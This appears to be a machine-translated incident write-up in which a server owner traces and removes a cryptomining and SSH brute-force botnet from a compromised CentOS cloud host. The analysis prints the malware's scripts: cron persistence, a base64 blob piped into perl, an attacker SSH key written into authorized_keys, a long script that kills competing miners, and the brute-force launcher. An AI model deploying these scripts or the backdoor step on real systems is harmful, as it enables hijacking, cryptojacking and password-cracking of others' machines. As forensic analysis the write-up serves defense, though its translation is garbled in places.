2, Check
2.1 first query the three processes with the most CPU consumption
Check the K processes that use the most memory
Method 1: ps -aux | sort -k3nr | head -K
image.png
Sort Parameter Description: undefined | options | description undefined | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - undefined |-n | sort according to the value, Sort by string size without - N undefined |-r | sort in reverse order undefined |-t | set the separator character used in sorting undefined |-k | specify the column to be sorted undefined |-u |
Method 2: enter top, and then enter capital P (enter capital M to invert memory)
image.png
Finally, it was found that the kswapd0 process was in disorder.
2.2 troubleshooting kswapd0 process
2.2.1 execute the command netstat -antlp | grep kswapd0 to query the network information of the process
[root@VM-0-13-centos etc]# netstat -antlp | grep kswapd0
tcp 0 0 172.17.0.13:55402 45.9.148.129:80 ESTABLISHED 31036/./kswapd0
It is found that a Dutch ip is communicating with the local port.
2.2.2 execute the command netstat -antlp | grep 45.9.148 to query other network occupation of ip in this region
[root@VM-0-13-centos etc]# netstat -antlp | grep 45.9.148
tcp 0 1 172.17.0.13:47182 45.9.148.99:443 SYN_SENT 31000/rsync
tcp 0 0 172.17.0.13:55402 45.9.148.129:80 ESTABLISHED 31036/./kswapd0
Another rsync process was found working.
Execute ps -ef | grep 31000
[root@VM-0-13-centos etc]# ps -ef | grep 31000
root 20734 28364 0 16:22 pts/1 00:00:00 grep --color=auto 31000
cj 31000 1 0 14:20 ? 00:00:00 rsync
There is indeed this rsync process working.
2.2.3 find process details
We went to the / proc / directory to find the corresponding pid numbers, namely / proc/31000 and / proc/31036. You can find the details of rsync process and kswapd0 process in these two directories.
Find the startup script as follows:
/proc/31000/exe -> /usr/bin/perl
/proc/31036/exe -> /tmp/.X25-unix/.rsync/a/kswapd0
In fact, I should look at the cmdline file, but it has been deleted by me.
/Proc / PID / cmdlineprocess startup command undefined /proc/pid/cwd link to the current working directory of the process undefined /proc/pid/environ process environment variable list undefined /proc/pid/exe link to the execution command file of the process undefined /proc/pid/fd contains all file descriptors related to the process undefined /proc/pid/maps memory mapping information related to the process undefined /proc/pid/mem refers to the memory held by the process. Unreadable undefined /proc/pid/root is linked to the root directory of the process undefined /proc/pid/stat the state of the process undefined /proc/pid/statm the state of the memory used by the process undefined /proc/pid/status the process state information is more readable than stat/statm undefined /proc/self is linked to the currently running process
2.2.4 viewing scheduled task crontab -l under cj user
[cj@VM-0-13-centos ~]$ crontab -l
1 1 */2 * * /home/cj/.configrc/a/upd>/dev/null 2>&1
@reboot /home/cj/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/cj/.configrc/b/sync>/dev/null 2>&1
@reboot /home/cj/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
I also played a lot of scripts for timed startup and restart.
2.2.4.1 view the directory / home/cj/.configrc/a /
Take a look at the upd script
#!/bin/sh
cd /home/cj/.configrc/a
if test -r /home/cj/.configrc/a/bash.pid; then
pid=$(cat /home/cj/.configrc/a/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1); then
exit 0
fi
fi
./run &>/dev/null
Check whether bash.pid exists and is readable in the script. If so, read the PID and kill the process. If the killing is successful, exit the script, otherwise execute the run script; Functions of undefined bash.pid file: 1. Content of PID file: PID file is a text file with only one line of content, recording the ID of the process. You can see it with the cat command. two The function of PID file: prevent the process from starting multiple copies. Only the process that obtains the write permission (F_WRLCK) of the PID file (fixed path and fixed file name) can start normally and write its own PID to the file. Other redundant processes of the same program exit automatically.
View the next run script
#!/bin/bash
./stop
./init0
sleep 10
pwd > dir.dir
dir=$(cat dir.dir)
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
nohup ./anacron >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./kswapd0
fi
echo $! > bash.pid
If the hardware type is "i686", start the. / anacron script; If it is "x86_64", start the evil kswapd0 script.
View the next kswapd0 script
Well, I can't open it. Can you give me some advice?
2.2.4.2 view the / home/cj/.configrc/b / directory
View sync script
#!/bin/sh
cd /home/cj/.configrc/b
./run
Call the run script directly.
View run script
#!/bin/sh
nohup ./stop>>/dev/null &
sleep 5
echo "yw5Ik......RPKjIhWyJCYEAAPzBJXX0=" | base64 --decode | perl
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAB......3K+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The character length of the original file is 4w more than words, all of which are some key information, and most of the unimportant key information is deleted. The script mainly writes the public key to the. ssh file, and then you can control the computer.
3, Settle
- crontab -e deletes scheduled tasks created by Trojans. Also check the scheduled task files in / var/spool/cron and / etc/cron.d directories.
- Delete all Trojan created files. Mainly / TMP /. X25 UNIX /, cj/.configrc files and tampered. ssh files. (see < Chapter V >)
- Kill all processes created by the Trojan horse. (see < Chapter V >)
If the user is not important, you can delete the user directly for the sake of insurance.
Query all users
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|moreDelete users and their corresponding folders
userdel -r cj
4, Analyze the cause
I found that the program runs under the cj user name, that is, the password of the ordinary user cj I created is too simple. It's better to use the key to log in. The password is just a few digits. It's not safe.
But why do you know the user name I created? I don't understand. Isn't it more convenient to crack the root user?
Think of a previous Elasticsearch attack: the deployed ELK cluster is used for log collection and storage. However, it was found that data was lost every few days, but no one deleted these logs. Later, it was found that they were attacked. Meow attack used automatic script to scan open and unsafe logs
Elasticsearch and MongoDB databases. Delete them directly after finding them.
5, Summary
Because the intruder is my ordinary user cj, I have not performed any operation under this user, and this user does not have sudo permission. Therefore, as long as the process under the cj user is mining.
All processes started by Trojan horse
cj 31000 1 0 14:20 ? 00:00:00 rsync
cj 31036 1 67 14:21 ? 01:37:01 ./kswapd0
cj 31328 1 0 14:22 ? 00:00:00 /bin/bash ./go
cj 31388 31328 0 14:22 ? 00:00:00 timeout 9h ./tsm -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
cj 31389 31388 0 14:22 ? 00:00:00 /bin/bash ./tsm -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
cj 31394 31389 27 14:22 ? 00:38:23 /tmp/.X25-unix/.rsync/c/lib/64/tsm --library-path /tmp/.X25-unix/.rsync/c/lib/64/ /usr/sbin/httpd rsync/c/tsm64 -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
kswapd0 is the mining procedure and tsm is the blasting procedure. Mining and blasting programs spread like viruses.
All scheduled tasks started by Trojan horse
[cj@VM-0-13-centos ~]$ crontab -l
1 1 */2 * * /home/cj/.configrc/a/upd>/dev/null 2>&1
@reboot /home/cj/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/cj/.configrc/b/sync>/dev/null 2>&1
@reboot /home/cj/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
All files created by Trojan horse
Write a script to query all files of cj user. The script is as follows
vim /root/searchfile.sh
#!/bin/bash
if [ $1 ];then
search_path=$1
else
echo "ERROR: SEARCH_PATH LOSED! "
exit 0
fi
if [ $2 ];then
user=$2
else
user=cj
fi
if [ $3 ];then
target_path=$3
else
target_path=/root/cjfile
fi
echo "" >> $target_path
echo "" >> $target_path
echo "------- $(date) ------" >> $target_path
search_user_file(){# get absolute path
local DIRNAME=`cd $(dirname $1);pwd`
local BASENAME=`basename $1`
local init_path=$DIRNAME/$BASENAME
echo "enter path => $init_path"
#files=`ls -al $1 | awk -v user=$user -v dirs="" 'NF==9&&$9!="."&&$9!=".."&&$3==user{dirs=dirs" "$9} END{print dirs}'` local files=`ls -al $1 | awk -v user=$user -v dirs="" 'NF==9&&$9!="."&&$9!=".."{dirs=dirs" "$9} END{print dirs}'`echo "file => $files"
if !(test -z "$files" );then
for dir in $files;do
local path=$init_path/$dir
#echo $path
if [ -d $path ];then
search_user_file $path $2 $3
else
local owner=`ls -l $path | awk '{print $3}'`#echo "------------------owner : $owner ------------------"
if [ $owner = $2 ];then
echo $path >> $3
fi
fi
done
fi
}
search_user_file $search_path $user $target_path
Execute. / searchfile.sh / in the script directory and run for more than ten minutes
All files created by the Trojan horse are as follows
------- Wed May 19 15:03:39 CST 2021 ------
/home/cj/.bash_history
/home/cj/.bash_logout
/home/cj/.bash_profile
/home/cj/.bashrc
/home/cj/.cache/abrt/lastnotification
/home/cj/.configrc/a/a
/home/cj/.configrc/a/bash.pid
/home/cj/.configrc/a/dir.dir
/home/cj/.configrc/a/init0
/home/cj/.configrc/a/kswapd0
/home/cj/.configrc/a/.procs
/home/cj/.configrc/a/run
/home/cj/.configrc/a/stop
/home/cj/.configrc/a/upd
/home/cj/.configrc/b/a
/home/cj/.configrc/b/dir.dir
/home/cj/.configrc/b/run
/home/cj/.configrc/b/stop
/home/cj/.configrc/b/sync
/home/cj/.configrc/dir2.dir
/home/cj/.ssh/authorized_keys
/home/cj/.viminfo
/tmp/.X25-unix/dota3.tar.gz
/tmp/.X25-unix/.rsync/1
/tmp/.X25-unix/.rsync/a/a
/tmp/.X25-unix/.rsync/a/init0
/tmp/.X25-unix/.rsync/a/kswapd0
/tmp/.X25-unix/.rsync/a/run
/tmp/.X25-unix/.rsync/a/stop
/tmp/.X25-unix/.rsync/b/a
/tmp/.X25-unix/.rsync/b/run
/tmp/.X25-unix/.rsync/b/stop
/tmp/.X25-unix/.rsync/c/1
/tmp/.X25-unix/.rsync/c/a
/tmp/.X25-unix/.rsync/c/aptitude
/tmp/.X25-unix/.rsync/c/dir.dir
/tmp/.X25-unix/.rsync/c/go
/tmp/.X25-unix/.rsync/c/golan
/tmp/.X25-unix/.rsync/c/lib/32/libc.so.6
/tmp/.X25-unix/.rsync/c/lib/32/libdl.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libnss_dns.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libnss_files.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libpthread.so.0
/tmp/.X25-unix/.rsync/c/lib/32/libresolv-2.23.so
/tmp/.X25-unix/.rsync/c/lib/32/libresolv.so.2
/tmp/.X25-unix/.rsync/c/lib/32/tsm
/tmp/.X25-unix/.rsync/c/lib/64/libc.so.6
/tmp/.X25-unix/.rsync/c/lib/64/libdl.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libnss_dns.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libnss_files.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libpthread.so.0
/tmp/.X25-unix/.rsync/c/lib/64/libresolv-2.23.so
/tmp/.X25-unix/.rsync/c/lib/64/libresolv.so.2
/tmp/.X25-unix/.rsync/c/lib/64/tsm
/tmp/.X25-unix/.rsync/c/n
/tmp/.X25-unix/.rsync/c/run
/tmp/.X25-unix/.rsync/c/scan.log
/tmp/.X25-unix/.rsync/c/slow
/tmp/.X25-unix/.rsync/c/start
/tmp/.X25-unix/.rsync/c/stop
/tmp/.X25-unix/.rsync/c/tsm
/tmp/.X25-unix/.rsync/c/tsm32
/tmp/.X25-unix/.rsync/c/tsm64
/tmp/.X25-unix/.rsync/c/v
/tmp/.X25-unix/.rsync/c/watchdog
/tmp/.X25-unix/.rsync/dir.dir
/tmp/.X25-unix/.rsync/init
/tmp/.X25-unix/.rsync/init2
/tmp/.X25-unix/.rsync/initall
/tmp/.X25-unix/.rsync/.out
/tmp/up.txt
/var/spool/cron/cj
/var/spool/mail/cj
/var/tmp/.systemcache436621
The shellbot backdoor is stored in directory a, the mining Trojan horse is stored in directory b, and the SSH blasting attack program is stored in directory c.
View historical commands and login
Execute the history view history command
It is found that all historical commands are gone, and the script may have been cleared automatically.
Execute last to view the recently logged in account records
It is found that there is no cj login record. It should also be cleared.
Execute / var/log/secure|grep 'Accepted' to view the ip address of successful login
[root@VM-0-13-centos tmp]# less /var/log/secure|grep 'Accepted'
May 18 13:57:27 VM-0-13-centos sshd[24567]: Accepted password for cj from 42.192.205.184 port 33090 ssh2
The IP 42.192.205.184 was found and successfully logged into the cloud at 13:57:27 p.m. at the same time as the creation of the up.txt file. That's the IP that cracked my password. The IP address is in Shanghai. It may also be the server hacked by the Trojan horse.
Foreign servers have high latency but large bandwidth, while domestic servers have small bandwidth but low latency. Transmission requires a large bandwidth and cracking requires a small delay, so it's reasonable to think about this configuration.
6, Script execution order
6.1 script under / home / CJ /. Configrc / A /
Install
#!/bin/sh
rm -rf /tmp/.FILE
rm -rf /tmp/.FILE*
rm -rf /dev/shm/.FILE*
rm -rf /dev/shm/.FILE
rm -rf /var/tmp/.FILE
rm -rf /var/tmp/.FILE*
rm -rf /tmp/nu.sh
rm -rf /tmp/nu.*
rm -rf /dev/shm/nu.sh
rm -rf /dev/shm/nu.*
rm -rf /tmp/.F*
rm -rf /tmp/.x*
rm -rf /tmp/tdd.sh
pkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .outkill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .outkill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .outkillall -9 xmrig
killall -9 ld-linux
kill -9 `ps x|grep xmrig|grep -v grep|awk '{print $1}'`kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`cat init | bash
sleep 10
cd ~
pwd > dir.dir
dir=$(cat dir.dir)
if [ -d "$dir/.bashtemprc2" ]; then
exit 0
else
cat init2 | bash
fi
exit 0
Execute dota/.rsync/initall. After installation has done some cleaning preparations, execute the init function.
Init
pkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .outkill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .outkill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .outpwd > dir.dir
dir=$(cat dir.dir)
cd $dir
chmod 777 *
rm -rf cron.d
rm -rf ~/.nullcach*
rm -rf ~/.firefoxcatch*
rm -rf ~/.bashtem*
rm -rf ~/.configrc*
mkdir ~/.configrc
cp -r a ~/.configrc/
cp -r b ~/.configrc/
cd ~/.configrc/a/
nohup ./init0 >> /dev/null &
sleep 5s
nohup ./a >>/dev/null &
cd ~/.configrc/b/
nohup ./a >>/dev/null &
cd $dir
cd c
nohup ./start >>/dev/null &
cd ~/.configrc/
pwd > dir2.dir
dir2=$(cat dir2.dir)
echo "1 1 */2 * * $dir2/a/upd>/dev/null 2>&1
@reboot $dir2/a/upd>/dev/null 2>&1
5 8 * * 0 $dir2/b/sync>/dev/null 2>&1
@reboot $dir2/b/sync>/dev/null 2>&1
0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1" >> cron.d
sleep 3s
rm -rf ~/ps
rm -rf ~/ps.*
crontab cron.d
crontab -l
Init clears its own mining process and writes scheduled tasks
Then execute dota/.rsync/a/a, and the a script executes init0. As mentioned in the note, the script that kills the encrypted miner ends the shell program of the competitive product. After the mining program is started, most of the mining software processes will be ended, and other mining software related files will be deleted to monopolize resources.
init0
#!/bin/sh
##########################################################################################\
### A script for killing cryptocurrecncy miners in a Linux enviornment
### Provided with zero liability (!)
###
### Some of the malware used as sources for this tool:
### https://pastebin.com/pxc1sXYZ
### https://pastebin.com/jRerGP1u
### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4
##########################################################################################\
# Killing processes by name, path, arguments and CPU utilization
processes(){ killme() { killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &}
killa() { what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&}
killa 34e2fg
killme
# Killing big CPU
VAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)for word in $VAR
do
CPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}') if [ $CPUUSAGE -gt 45 ]; then echo BIG $word; PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;done
killall \.Historys
killall \.sshd
killall neptune
killall xm64
killall xm32
killall ld-linux
killall xmrig
killall \.xmrig
killall suppoieup
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "119.9.76.107:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ld-linux" | awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9 ps auxf|grep Donald| awk '{print $2}'|xargs kill -9 ps auxf|grep Macron| awk '{print $2}'|xargs kill -9 ps auxf|grep ld-linux| awk '{print $2}'|xargs kill -9 ps auxf|grep named| awk '{print $2}'|xargs kill -9 ps auxf|grep kernelcfg| awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9 ps auxf|grep kernelupgrade| awk '{print $2}'|xargs kill -9 ps auxf|grep kernelorg| awk '{print $2}'|xargs kill -9 ps auxf|grep kernelupdates| awk '{print $2}'|xargs kill -9ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f /usr/bin/.sshd
pkill -f acpid
pkill -f Donald
pkill -f Macron
pkill -f AnXqV.yam
pkill -f apaceha
pkill -f askdljlqw
pkill -f bashe
pkill -f bashf
pkill -f bashg
pkill -f bashh
pkill -f bashx
pkill -f BI5zj
pkill -f biosetjenkins
pkill -f bonn.sh
pkill -f bonns
pkill -f conn.sh
pkill -f conns
pkill -f cryptonight
pkill -f crypto-pool
pkill -f ddg.2011
pkill -f deamon
pkill -f disk_genius
pkill -f donns
pkill -f Duck.sh
pkill -f gddr
pkill -f Guard.sh
pkill -f i586
pkill -f icb5o
pkill -f ir29xc1
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbalanc1
pkill -f irqbalance
pkill -f irqbnc1
pkill -f JnKihGjn
pkill -f jweri
pkill -f kw.sh
pkill -f kworker34
pkill -f kxjd
pkill -f libapache
pkill -f Loopback
pkill -f lx26
pkill -f mgwsl
pkill -f minerd
pkill -f minergate
pkill -f minexmr
pkill -f mixnerdx
pkill -f mstxmr
pkill -f nanoWatch
pkill -f nopxi
pkill -f NXLAi
pkill -f performedl
pkill -f polkitd
pkill -f pro.sh
pkill -f pythno
pkill -f qW3xT.2
pkill -f sourplum
pkill -f stratum
pkill -f sustes
pkill -f wnTKYg
pkill -f XbashY
pkill -f XJnRj
pkill -f xmrig
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f ysaydh
pkill -f zigw
pkill -f ld-linux
# crond
ps ax | grep crond | grep -v grep | awk '{print $1}' > /tmp/crondpidwhile read crondpid
do
if [ $(echo $(ps -p $crondpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $crondpid
rm -rf /var/tmp/v3
fi
done < /tmp/crondpid
rm /tmp/crondpid -f
# sshd
ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpidwhile read sshdpid
do
if [ $(echo $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $sshdpid
fi
done < /tmp/ssdpid
rm -f /tmp/ssdpid
# syslog
ps ax | grep syslogs | grep -v grep | awk '{print $1}' > /tmp/syslogspidwhile read syslogpid
do
if [ $(echo $(ps -p $syslogpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $syslogpid
fi
done < /tmp/syslogspid
rm /tmp/syslogspid -f
ps x | grep 'b 22'| awk '{print $1,$5}' > .procscat .procs | while read line
do
pid=`echo $line | awk '{print $1;}'` name=`echo $line | awk '{print $2;}'`#echo $pid $name
if [ $(echo $name | wc -c) -lt "13" ]
then
echo "Found" $pid $name
kill -9 $pid
fi
done
####################################################
ps x | grep 'd 22'| awk '{print $1,$5}' > .procscat .procs | while read line
do
pid=`echo $line | awk '{print $1;}'` name=`echo $line | awk '{print $2;}'`#echo $pid $name
if [ $(echo $name | wc -c) -lt "13" ]
then
echo "Found" $pid $name
kill -9 $pid
fi
done
}
# Removing miners by known path IOC
files(){rm /tmp/.cron
rm /tmp/Donald*
rm /tmp/Macron*
rm /tmp/.main
rm /tmp/.yam* -rf
rm -f /tmp/irq
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*httpd.conf
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*index_bak*
rm -rf /tmp/.systemd-private-*
rm -rf /tmp/.xm*
rm -rf /tmp/a7b104c270
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -rf /tmp/httpd.conf
rm -rf /tmp/java*
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/xm*
rm -rf /var/tmp/java*
}
# Killing and blocking miners by network related IOC
network(){# Kill by known ports/IPs
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 119.9.76.107 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :23 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :143 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :2222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3389 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :6665 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :6667 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :8444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9}
files
processes
network
echo "DONE"
Then judge the platform type. If it is "i686", execute anacron, which is a mining Trojan horse based on the linux platform modified by xmrig2.14; If x86_64 starts. / kswapd0.
Then execute dota/.rsync/b/a, b/a and finally ps. ps is the ssh back door server mentioned above, which is convenient for hackers to log in remotely with secret free ssh.
Then execute the start of c directory, and download the server address, port and some dictionaries to be exploded online.
#!/bin/sh
pwd > dir.dir
dir=$(cat dir.dir)
cd $dir
chmod 777 *
rm -rf n
echo "1">n
echo "#!/bin/sh
cd $dir
./run &>/dev/null" > aptitude
chmod u+x aptitude
chmod 777 *
./aptitude >> /dev/null &
exit 0
After catching up, I found that the tsm script was started in the go script to execute the tsm in the directory and pass in the IP and dictionary to be exploded
#!/bin/bash
dir=`pwd`
cd $dir
threads=535
ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
threads=75
fi
while :
do
touch v
rm -rf p
rm -rf ip
rm -rf xtr*
rm -rf a a.*
rm -rf b b.*
sleep $[ ( $RANDOM % 30 ) + 1 ]s
timeout 9h ./tsm -t $threads -f 1 -s 12 -S 9 -p 0 -d 1 p ip
sleep 3
rm -rf xtr*
rm -rf ip
rm -rf p
rm -rf .out
rm -rf /tmp/t*
done
exit 0
tsm script
#!/bin/bash
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
$SCRIPT_PATH/lib/32/tsm --library-path $SCRIPT_PATH/lib/32/ $SCRIPT_PATH/tsm32 $*
elif [ "$ARCH" == "x86_64" ]; then
$SCRIPT_PATH/lib/64/tsm --library-path $SCRIPT_PATH/lib/64/ $SCRIPT_PATH/tsm64 $*
fi